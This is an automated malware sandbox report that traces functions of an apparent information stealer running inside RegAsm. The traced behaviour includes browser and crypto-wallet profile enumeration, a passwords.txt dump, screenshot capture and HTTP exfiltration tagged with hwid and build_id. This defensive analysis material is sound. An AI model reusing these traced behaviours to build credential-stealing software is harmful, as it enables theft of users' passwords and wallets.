Associated: 00000001.00000002.2794222735.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: NtQueryInformationProcess$kernel32.dll
API String ID: 2238633743-258108907
Opcode ID: d3dc7f79465fd81c2f6d2aeca6bccb15f19688e2caa800e74057db0e9ec5c149
Instruction ID: 54f81618b0003c9a7d9cd87b1105554b9cb69cd8690f86f09dc99c509db4cf5f
Opcode Fuzzy Hash: d3dc7f79465fd81c2f6d2aeca6bccb15f19688e2caa800e74057db0e9ec5c149
Instruction Fuzzy Hash: 3D9134BDA002029FD744DFA4EC6896637FBF78EB413A06519FA05C7360EB349885CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00416740 Relevance: 49.3, APIs: 23, Strings: 5, Instructions: 334
stringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wsprintfA.USER32 ref: 0041677A
FindFirstFileA.KERNEL32(?,?,?,00416D98,00416EE5), ref: 00416791
memset.MSVCRT ref: 004167A9
memset.MSVCRT ref: 004167BB
StrCmpCA.SHLWAPI(?,00428648,?,?,?,?,?,?,?,00416D98,00416EE5), ref: 0041680C
StrCmpCA.SHLWAPI(?,0042864C,?,?,?,?,?,?,?,00416D98,00416EE5), ref: 00416826
wsprintfA.USER32 ref: 0041684B
StrCmpCA.SHLWAPI(?,0042835F,?,?,?,?,?,?,?,?,?,?,?,00416D98,00416EE5), ref: 0041685D
wsprintfA.USER32 ref: 00416885
memset.MSVCRT ref: 004168BD
lstrcat.KERNEL32(?,?), ref: 004168D0
strtok_s.MSVCRT ref: 004168E6
strtok_s.MSVCRT ref: 00416913
memset.MSVCRT ref: 0041692C
lstrcat.KERNEL32(?,?), ref: 0041693C
strtok_s.MSVCRT ref: 00416952
PathMatchSpecA.SHLWAPI(?,00000000), ref: 0041696A

Strings

%s\%s, xrefs: 004168A1
%s\%s, xrefs: 00416845
%s%s, xrefs: 004169A3
%s\*.*, xrefs: 0041676F
%s\%s\%s, xrefs: 0041687F

Memory Dump Source

Source File: 00000001.00000002.2794222735.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2794222735.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: memset$strtok_swsprintf$lstrcat$FileFindFirstMatchPathSpec
String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*.*
API String ID: 1425701045-3225784412
Opcode ID: 8626fca86b05ac8aaf2817f9b7a50739662535e5c9a0d08921c2eb99929d4ad6
Instruction ID: 9df80aab3b2c67129cd77f9efb50d4b945a18d7e013ca70540632bd8ef74930f
Opcode Fuzzy Hash: 8626fca86b05ac8aaf2817f9b7a50739662535e5c9a0d08921c2eb99929d4ad6
Instruction Fuzzy Hash: 16C1DAB5900209ABCB14DFA4DC85EEE77B8EF49704F50855EF505A3281DB389E88CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0040D4F0 Relevance: 42.9, APIs: 18, Strings: 6, Instructions: 913
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9

Part of subcall function 0040FFB0: lstrcpy.KERNEL32(00000000), ref: 00410013
Part of subcall function 0040FFB0: lstrcat.KERNEL32(?,00000000), ref: 0041001F

Part of subcall function 00410040: lstrlen.KERNEL32(?,?,?,?,?,?,00421D69,000000FF,?,004188B7,?,01562EF0,?), ref: 0041007C
Part of subcall function 00410040: lstrcpy.KERNEL32(00000000), ref: 004100A7
Part of subcall function 00410040: lstrcat.KERNEL32(?,?), ref: 004100B1

Part of subcall function 0040FF60: lstrcpy.KERNEL32(00000000), ref: 0040FFA0

FindFirstFileA.KERNEL32(00000000,?,00427A9B,00427A9A,00000000,?,00427BDC,?,?,00427A97,?,00000000,00000005), ref: 0040D5A4
StrCmpCA.SHLWAPI(?,00427BE0), ref: 0040D61C
StrCmpCA.SHLWAPI(?,00427BE4), ref: 0040D636
StrCmpCA.SHLWAPI(00000000,Opera GX,00000000,?,?,?,00427BE8,?,?,00427A9E), ref: 0040D6E7

Strings

Google Chrome, xrefs: 0040DE2B
Opera GX, xrefs: 0040D6D6
Brave, xrefs: 0040D8DF
\BraveWallet\Preferences, xrefs: 0040D9E4
F, xrefs: 0040E179
Preferences, xrefs: 0040D8FE

Memory Dump Source

Source File: 00000001.00000002.2794222735.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2794222735.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
String ID: Brave$F$Google Chrome$Opera GX$Preferences$\BraveWallet\Preferences
API String ID: 2567437900-1653842991
Opcode ID: 8653c93725c62dc33c7048253eaf4a61a78e75d13c9aba3aba8e6bba28a6e15d
Instruction ID: 52dee1824ab0a65af1c6b66960748f4e36746aede80700b1bdbde72769120ff5
Opcode Fuzzy Hash: 8653c93725c62dc33c7048253eaf4a61a78e75d13c9aba3aba8e6bba28a6e15d
Instruction Fuzzy Hash: 32829370900248EADB15EBA5C955BDDBBB86F19304F1040AEF945B32C2DF781B4CCBA6

Uniqueness

Uniqueness Score: -1.00%

Function 0040D090 Relevance: 40.6, APIs: 22, Strings: 1, Instructions: 335
stringmemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9

Part of subcall function 00410040: lstrlen.KERNEL32(?,?,?,?,?,?,00421D69,000000FF,?,004188B7,?,01562EF0,?), ref: 0041007C
Part of subcall function 00410040: lstrcpy.KERNEL32(00000000), ref: 004100A7
Part of subcall function 00410040: lstrcat.KERNEL32(?,?), ref: 004100B1

Part of subcall function 0040FF60: lstrcpy.KERNEL32(00000000), ref: 0040FFA0

Part of subcall function 004114D0: GetSystemTime.KERNEL32(?,0156F1F0,00428288,?,00000000,00000000,004283A2,00000000,?,00000000,00423261,000000FF,?,00418949), ref: 00411525

Part of subcall function 0040FFB0: lstrcpy.KERNEL32(00000000), ref: 00410013
Part of subcall function 0040FFB0: lstrcat.KERNEL32(?,00000000), ref: 0041001F

CopyFileA.KERNEL32(00000000,00000000,00000001,00000000,?,00000000,00000000,?), ref: 0040D149
GetProcessHeap.KERNEL32(00000000,000F423F), ref: 0040D1E2
RtlAllocateHeap.NTDLL(00000000), ref: 0040D1E9
lstrlen.KERNEL32(00000000,00000000), ref: 0040D296
lstrcat.KERNEL32(000000FF,0156F700), ref: 0040D2B0
lstrcat.KERNEL32(000000FF,00000000), ref: 0040D2C3

Part of subcall function 0040FEC0: lstrcpy.KERNEL32(00000000), ref: 0040FEE8

Part of subcall function 00411AA0: memset.MSVCRT ref: 00411AD5
Part of subcall function 00411AA0: GetProcessHeap.KERNEL32(00000000,000000FA,?,00000000,?,004075E6,0040DC76), ref: 00411B06
Part of subcall function 00411AA0: HeapAlloc.KERNEL32(00000000,?,004075E6,0040DC76), ref: 00411B0D
Part of subcall function 00411AA0: wsprintfW.USER32 ref: 00411B1C
Part of subcall function 00411AA0: OpenProcess.KERNEL32(00001001,00000000), ref: 00411B7D
Part of subcall function 00411AA0: TerminateProcess.KERNEL32(00000000,00000000), ref: 00411B8C
Part of subcall function 00411AA0: CloseHandle.KERNEL32(00000000), ref: 00411B93

lstrcat.KERNEL32(000000FF,00427A6C), ref: 0040D2D2
lstrcat.KERNEL32(000000FF,00000000), ref: 0040D2E5
lstrcat.KERNEL32(000000FF,00427A70), ref: 0040D2F4
lstrcat.KERNEL32(000000FF,0156F710), ref: 0040D305
lstrcat.KERNEL32(000000FF,00000000), ref: 0040D318
lstrcat.KERNEL32(000000FF,00427A74), ref: 0040D327
lstrcat.KERNEL32(000000FF,0156F7F0), ref: 0040D338
lstrcat.KERNEL32(000000FF,00000000), ref: 0040D34B
lstrcat.KERNEL32(000000FF,00427A78), ref: 0040D35A
lstrcat.KERNEL32(000000FF,01572240), ref: 0040D36A
lstrcat.KERNEL32(000000FF,00000000), ref: 0040D37D
lstrcat.KERNEL32(000000FF,00427A7C), ref: 0040D38C
lstrcat.KERNEL32(000000FF,00427A80), ref: 0040D39B
lstrlen.KERNEL32(000000FF), ref: 0040D3D3
memset.MSVCRT ref: 0040D428
DeleteFileA.KERNEL32(00000000), ref: 0040D458

Strings

passwords.txt, xrefs: 0040D3E6

Memory Dump Source

Source File: 00000001.00000002.2794222735.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2794222735.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$HeapProcess$lstrlen$Filememset$AllocAllocateCloseCopyDeleteHandleOpenSystemTerminateTimewsprintf
String ID: passwords.txt
API String ID: 4049833551-347816968
Opcode ID: d387000265917b568817f1fcd2c2459dc7c0458e382306b92f0ffc660c2a8358
Instruction ID: 215b863f2430d563b93ca64cb16b4ae420a8412cb18fc12b55f4b5a4a6015adc
Opcode Fuzzy Hash: d387000265917b568817f1fcd2c2459dc7c0458e382306b92f0ffc660c2a8358
Instruction Fuzzy Hash: 55D17474900209ABCB04EBE4DC56BEEBB79AF19304F50452EF911B3291DF785A48CBB5

Uniqueness

Uniqueness Score: -1.00%

Function 00404490 Relevance: 37.3, APIs: 13, Strings: 8, Instructions: 537
networkfilestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040FEC0: lstrcpy.KERNEL32(00000000), ref: 0040FEE8

Part of subcall function 004043C0: ??_U@YAPAXI@Z.MSVCRT ref: 00404412
Part of subcall function 004043C0: ??_U@YAPAXI@Z.MSVCRT ref: 0040441F
Part of subcall function 004043C0: ??_U@YAPAXI@Z.MSVCRT ref: 0040442C
Part of subcall function 004043C0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00404446
Part of subcall function 004043C0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404456

Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040455A
StrCmpCA.SHLWAPI(?,0156F910,?,?,?,?,?,?,00000000), ref: 0040457A

Part of subcall function 0040FF60: lstrcpy.KERNEL32(00000000), ref: 0040FFA0

InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404704
HttpOpenRequestA.WININET(00000000,0156F920,?,01572300,00000000,00000000,-00400100,00000000), ref: 00404745
InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 0040476B

Part of subcall function 00410040: lstrlen.KERNEL32(?,?,?,?,?,?,00421D69,000000FF,?,004188B7,?,01562EF0,?), ref: 0041007C
Part of subcall function 00410040: lstrcpy.KERNEL32(00000000), ref: 004100A7
Part of subcall function 00410040: lstrcat.KERNEL32(?,?), ref: 004100B1

Part of subcall function 0040FFB0: lstrcpy.KERNEL32(00000000), ref: 00410013
Part of subcall function 0040FFB0: lstrcat.KERNEL32(?,00000000), ref: 0041001F

lstrlen.KERNEL32(00000000,00000000,004201A9,?,?,?,00427895,00000000,004201A9,?,00000000,004201A9,",00000000,004201A9,build_id), ref: 00404A3A
lstrlen.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00404A53
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00404A64
InternetReadFile.WININET(00000000,?,000007CF,00000000), ref: 00404A7B
InternetReadFile.WININET(00000000,00000000,000007CF,00000000), ref: 00404ACF
InternetCloseHandle.WININET(00000000), ref: 00404ADA
InternetCloseHandle.WININET(?), ref: 00404AEF
InternetCloseHandle.WININET(00000000), ref: 00404AF9

Strings

", xrefs: 0040483F
hwid, xrefs: 00404816
build_id, xrefs: 0040495E
------, xrefs: 004045FF
", xrefs: 00404987
------, xrefs: 004048B9
!, xrefs: 00404AB5
------, xrefs: 00404771

Memory Dump Source

Source File: 00000001.00000002.2794222735.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2794222735.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Internet$lstrcpy$lstrlen$CloseHandle$FileHttpOpenReadRequestlstrcat$ConnectCrackOptionSend
String ID: !$"$"$------$------$------$build_id$hwid
API String ID: 1585128682-3346224549
Opcode ID: 3bec59f1e81583d763863414455f967b149263d6d42af27e38d7443cc47b412c
Instruction ID: 05938b0e318a003ddb6cc0cd5bccca28d8fa4bc8ac54279827d029eeae647f4c
Opcode Fuzzy Hash: 3bec59f1e81583d763863414455f967b149263d6d42af27e38d7443cc47b412c
Instruction Fuzzy Hash: 76223F71805149EADB15E7E5C952BEEBBB8AF19304F2440AEF50173182DE782B4CCB79

Uniqueness

Uniqueness Score: -1.00%

Function 00417800 Relevance: 33.5, APIs: 16, Strings: 3, Instructions: 204
stringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wsprintfA.USER32 ref: 00417838
FindFirstFileA.KERNEL32(?,?), ref: 0041784F
StrCmpCA.SHLWAPI(?,00428704), ref: 0041789C
StrCmpCA.SHLWAPI(?,00428708), ref: 004178B6
wsprintfA.USER32 ref: 004178DB
StrCmpCA.SHLWAPI(?,0042836E), ref: 004178EA
wsprintfA.USER32 ref: 00417907
PathMatchSpecA.SHLWAPI(?,?), ref: 00417937
lstrcat.KERNEL32(?,0156F900), ref: 00417963
lstrcat.KERNEL32(?,00428720), ref: 00417975
lstrcat.KERNEL32(?,?), ref: 00417983
lstrcat.KERNEL32(?,00428724), ref: 00417995
lstrcat.KERNEL32(?,?), ref: 004179A9

Strings

%s\%s, xrefs: 004178D5
%s\*, xrefs: 0041782B
%s\%s, xrefs: 00417920

Memory Dump Source

Source File: 00000001.00000002.2794222735.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2794222735.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$wsprintf$FileFindFirstMatchPathSpec
String ID: %s\%s$%s\%s$%s\*
API String ID: 3088078853-445461498
Opcode ID: dd4b5552ebb8a200a6500d3c24df88273e523bdc8c19d81b619127e0f4875644
Instruction ID: 98b5a54622b645726d4fda38e5423e71ee503b351a3d596aa25196b1fd800074
Opcode Fuzzy Hash: dd4b5552ebb8a200a6500d3c24df88273e523bdc8c19d81b619127e0f4875644
Instruction Fuzzy Hash: ED81C475900219ABCB10EFA1DC85BEE77B9BF49704F50459EFA09A3181DB385B48CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 004110A0 Relevance: 29.9, APIs: 10, Strings: 7, Instructions: 166
memorycomtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoInitializeEx.OLE32(00000000,00000000,?,00000000,?,Windows: ,00000000,?,0042840C,00000000,?,Work Dir: In memory,00000000,?,004283F4,00000000), ref: 004110C3
CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,00000000,?,Windows: ,00000000,?,0042840C), ref: 004110D4
CoCreateInstance.OLE32(00428D34,00000000,00000001,00428C64,?,?,00000000,?,Windows: ,00000000,?,0042840C,00000000,?,Work Dir: In memory,00000000), ref: 004110EE
CoSetProxyBlanket.OLE32(004283F4,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,00000000,?,Windows: ,00000000,?,0042840C,00000000), ref: 00411127
VariantInit.OLEAUT32(?), ref: 00411186

Part of subcall function 00410FF0: CoCreateInstance.OLE32(00428AE4,00000000,00000001,00428278,?,00000001,00000001,?,00000000,?,Windows: ,00000000,?,0042840C,00000000,?), ref: 0041100D
Part of subcall function 00410FF0: SysAllocString.OLEAUT32(?), ref: 0041101C
Part of subcall function 00410FF0: _wtoi64.MSVCRT ref: 00411062
Part of subcall function 00410FF0: SysFreeString.OLEAUT32(?), ref: 00411078
Part of subcall function 00410FF0: SysFreeString.OLEAUT32(00000000), ref: 0041107B

FileTimeToSystemTime.KERNEL32(0042840C,?,?,?,?,00000000,?,Windows: ,00000000,?,0042840C,00000000,?,Work Dir: In memory,00000000,?), ref: 004111C0
GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,?,Windows: ,00000000,?,0042840C,00000000,?,Work Dir: In memory,00000000,?), ref: 004111CC
HeapAlloc.KERNEL32(00000000,?,?,?,00000000,?,Windows: ,00000000,?,0042840C,00000000,?,Work Dir: In memory,00000000,?,004283F4), ref: 004111D3
VariantClear.OLEAUT32(?), ref: 00411217
wsprintfA.USER32 ref: 004111FF

Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9

Strings

WQL, xrefs: 00411144
Select * From Win32_OperatingSystem, xrefs: 00411137
ROOT\CIMV2, xrefs: 00411106
Unknown, xrefs: 00411235
InstallDate, xrefs: 0041119B
%d/%d/%d %d:%d:%d, xrefs: 004111F9
Unknown, xrefs: 0041122E

Memory Dump Source

Source File: 00000001.00000002.2794222735.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2794222735.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: String$AllocCreateFreeHeapInitializeInstanceTimeVariant$BlanketClearFileInitProcessProxySecuritySystem_wtoi64lstrcpywsprintf
String ID: %d/%d/%d %d:%d:%d$InstallDate$ROOT\CIMV2$Select * From Win32_OperatingSystem$Unknown$Unknown$WQL
API String ID: 1611285705-2016369993
Opcode ID: 39b1fb2a7ba7e6d53decbf1ced49d5b46778855afd756b0b7f4cf079842b4c2d
Instruction ID: 2f8da4572961598b54827d09d40e8d86347dea92272749ef862c40ce3fce3f1e
Opcode Fuzzy Hash: 39b1fb2a7ba7e6d53decbf1ced49d5b46778855afd756b0b7f4cf079842b4c2d
Instruction Fuzzy Hash: 31517C71A01229ABCB24DB95DC49EFFBB7CEF49B10F10411AF605A3290D7789942CBE4

Uniqueness

Uniqueness Score: -1.00%

Function 00411DF0 Relevance: 28.2, APIs: 15, Strings: 1, Instructions: 212windowCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00411E2B
GetDesktopWindow.USER32 ref: 00411EC2
GetWindowRect.USER32(00000000,?), ref: 00411ECF
GetDC.USER32(00000000), ref: 00411ED6
CreateCompatibleDC.GDI32(00000000), ref: 00411EDF
CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00411EF0
SelectObject.GDI32(00000000,00000000), ref: 00411EFB
BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,00CC0020), ref: 00411F1B
GlobalFix.KERNEL32(000000FF), ref: 00411F81
GlobalSize.KERNEL32(000000FF), ref: 00411F8E

Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9

Part of subcall function 0040FEC0: lstrcpy.KERNEL32(00000000), ref: 0040FEE8

Part of subcall function 00404DD0: lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404E56
Part of subcall function 00404DD0: StrCmpCA.SHLWAPI(?,0156F910,004278A7,004278A3,0042789B,00427897,00427896), ref: 00404EE1
Part of subcall function 00404DD0: InternetOpenA.WININET(00000000,00000001,?,?,?), ref: 00404F07

SelectObject.GDI32(00000000,?), ref: 0041200D
DeleteObject.GDI32(00000000), ref: 0041202B
DeleteObject.GDI32(00000000), ref: 00412032
ReleaseDC.USER32(00000000,00000000), ref: 0041203A
CloseWindow.USER32(00000000), ref: 00412041

Strings

image/jpeg, xrefs: 00411F3D

Memory Dump Source

Source File: 00000001.00000002.2794222735.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2794222735.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Object$Window$CompatibleCreateDeleteGlobalSelectlstrcpy$BitmapCloseDesktopInternetOpenRectReleaseSizelstrlenmemset
String ID: image/jpeg
API String ID: 2262162031-3785015651
Opcode ID: 8a9ceb8a640c1142b84bfe425a3677517ac850c695dfc15065c52484ca172122
Instruction ID: 2d4e664fba7b2a05d5ee53653e52332fc25948be14a74fdae1dc0a0959ef4bc3
Opcode Fuzzy Hash: 8a9ceb8a640c1142b84bfe425a3677517ac850c695dfc15065c52484ca172122
Instruction Fuzzy Hash: F48170B5900209EFDB14DFA4DD45BEEBBB9EF4A704F10412EFA05A3290DB385905CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00416F50 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 161stringfileCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 00416F8B
FindFirstFileA.KERNEL32(?,?), ref: 00416FA2
StrCmpCA.SHLWAPI(?,004286D4), ref: 00416FDF
StrCmpCA.SHLWAPI(?,004286D8), ref: 00416FF9
lstrcat.KERNEL32(?,0156F900), ref: 00417037
lstrcat.KERNEL32(?,0156FA00), ref: 0041704B
lstrcat.KERNEL32(?,?), ref: 0041705F
lstrcat.KERNEL32(?,?), ref: 0041706D
lstrcat.KERNEL32(?,004286DC), ref: 0041707F
lstrcat.KERNEL32(?,?), ref: 00417093
FindNextFileA.KERNEL32(00000000,?), ref: 00417137

Strings

%s\%s, xrefs: 00416F7E

Memory Dump Source

Source File: 00000001.00000002.2794222735.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2794222735.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$FileFind$FirstNextwsprintf
String ID: %s\%s
API String ID: 111849568-4073750446
Opcode ID: 072cdcf92336228de56ae1516b8a9c8fc56147d7ea042199880caf657913251d
Instruction ID: 32a1530b6f6b3f971f2372f18af5ada9a00b89577cc7e7e1cca20f8dd29428d7
Opcode Fuzzy Hash: 072cdcf92336228de56ae1516b8a9c8fc56147d7ea042199880caf657913251d
Instruction Fuzzy Hash: 7B51E4B1800218ABCB10EBA0CC45BEE777DBF09704F40459EFB05A3181DB789B88CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0040B1B0 Relevance: 21.7, APIs: 7, Strings: 5, Instructions: 664fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9

Part of subcall function 0040FFB0: lstrcpy.KERNEL32(00000000), ref: 00410013
Part of subcall function 0040FFB0: lstrcat.KERNEL32(?,00000000), ref: 0041001F

